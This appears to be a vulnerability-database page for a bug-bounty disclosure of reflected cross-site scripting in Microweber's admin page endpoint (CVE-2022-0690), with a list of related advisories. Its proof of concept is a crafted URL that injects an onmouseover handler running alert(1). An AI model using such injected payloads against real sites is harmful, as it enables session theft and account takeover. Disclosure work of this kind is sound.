Lucene search
Daman-preet-singh4999A0F4-6EFB-4681-B4BA-B36BABC366F9HistoryFeb 19, 2022 - 1:26 p.m.
Cross-site Scripting (XSS) - Reflected
2022-02-1913:26:24
daman-preet-singh
www.huntr.dev
7
0.001 Low
EPSS
Percentile
30.2%
Description
Hi, The endpoint https://demo.microweber.org/demo/admin/page is vulnerable to Cross Site Scripting.
Proof of Concept
-
just navigate to the poc url:
https://demo.microweber.org/demo/admin/page/8tojh1"onmouseover%3D"alert(1)"style%3D"position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B"yrr2n/edit -
now move your mouse on the page, you will see a xss popup.
(login if site asks)
Impact
Cross site scripting attacks can lead to account takeover via cookie stealing, temporary site deface, redirecting users to attackers controlled sites etc.
Related
veracode
veracode
Cross-site Scripting (XSS)
2022-02-21 05:51:21
osv
osv
CVE-2022-0690
2022-02-19 17:15:08
Cross-site Scripting in microweber
2022-02-20 00:00:31
cve
cve
CVE-2022-0690
2022-02-19 17:15:08
github
github
Cross-site Scripting in microweber
2022-02-20 00:00:31
cnvd
cnvd
microweber cross-site scripting vulnerability (CNVD-2022-13205)
2022-02-22 00:00:00
prion
prion
Cross site scripting
2022-02-19 17:15:00
cvelist
cvelist
nvd
nvd
CVE-2022-0690
2022-02-19 17:15:08